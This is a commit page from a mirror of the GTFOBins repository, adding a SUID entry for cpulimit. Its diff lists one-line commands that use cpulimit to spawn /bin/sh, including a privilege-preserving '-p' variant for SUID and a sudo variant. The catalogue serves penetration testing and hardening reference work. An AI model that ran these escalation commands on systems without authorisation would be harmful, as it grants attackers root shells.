1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 16:26:01 +02:00

Add cpulimit SUID

This commit is contained in:
AssassinUKG 2021-02-27 11:06:40 +00:00 committed by GitHub
parent eca7899007
commit c20963cfd6
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -2,6 +2,8 @@
functions:
shell:
- code: cpulimit -l 100 -f /bin/sh
suid:
- code: ./cpulimit -l 100 -f -- /bin/sh -p
sudo:
- code: sudo cpulimit -l 100 -f /bin/sh
---